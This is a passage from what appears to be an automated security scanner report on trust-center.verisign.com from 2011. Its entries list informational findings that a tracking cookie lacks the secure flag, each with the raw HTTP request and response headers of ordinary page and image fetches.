User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vtrh54nwcc; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=03CA6F76DB2F10DB4BFEB1847A7DDBAF

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:59:40 GMT
Server: Apache
Set-Cookie: TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Set-Cookie: JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; Path=/; Secure
Location: http://www.verisign.com/ssl/buy-ssl-certificates/index.html
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html


6.24. https://trust-center.verisign.com/process/retail/trust_initial

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/trust_initial

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_initial?application_locale=VTC_US&promoCode=TSAB9999&UI=PPT HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:26:31 GMT
Server: Apache
Set-Cookie: TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/trust_product_selector?uid=54e97416d385e356d49a079c459d836b&product=TRUSTSEAL001
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html


6.25. https://trust-center.verisign.com/process/retail/trust_product_selector

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/trust_product_selector

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTHID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 41019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...

6.26. https://trust-center.verisign.com/process/retail/trust_product_selector.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/trust_product_selector.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_product_selector.do HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:02 GMT
Server: Apache
Set-Cookie: TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/trust_capture_tech_contact_details?uid=25a7ccba99f4ee1a587cdec832e34e73
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


6.27. https://trust-center.verisign.com/rcm/TeaLeafTarget.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/TeaLeafTarget.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /rcm/TeaLeafTarget.html HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
Content-Length: 1103
X-TeaLeaf-Page-Objects: 0
Origin: https://trust-center.verisign.com
X-TeaLeaf-Page-Img-Fail: 1
X-TeaLeaf-Page-Render: 123
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.11.17.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719

<ClientEventSet PostTimeStamp="1315621658502" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID21H27M8S358R0.8013692023232579" TimeDuration="123" DateSince1970="1315621628481" >

...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:10 GMT
Server: Apache
Set-Cookie: TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 32
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<html>
<body>
OK
</body>
</html>

6.28. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/arrow_progressBar_gray.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/arrow_progressBar_gray.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 91
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif


6.29. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/arrow_progressBar_red.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/arrow_progressBar_red.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 90
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif


6.30. https://trust-center.verisign.com/rcm/verisign/images/divider.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/divider.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/divider.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 44
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif


6.31. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/ico_questionmark.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/ico_questionmark.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 374
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif


6.32. https://trust-center.verisign.com/rcm/verisign/images/logo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/logo.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/logo.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 16073
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif


6.33. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/popup_button_left.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/popup_button_left.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 348
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif


6.34. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/popup_button_right.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/popup_button_right.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 344
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif


6.35. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/pricebox_bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/pricebox_bg.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 13169
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif


6.36. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/sm_004276_oo.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/sm_004276_oo.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
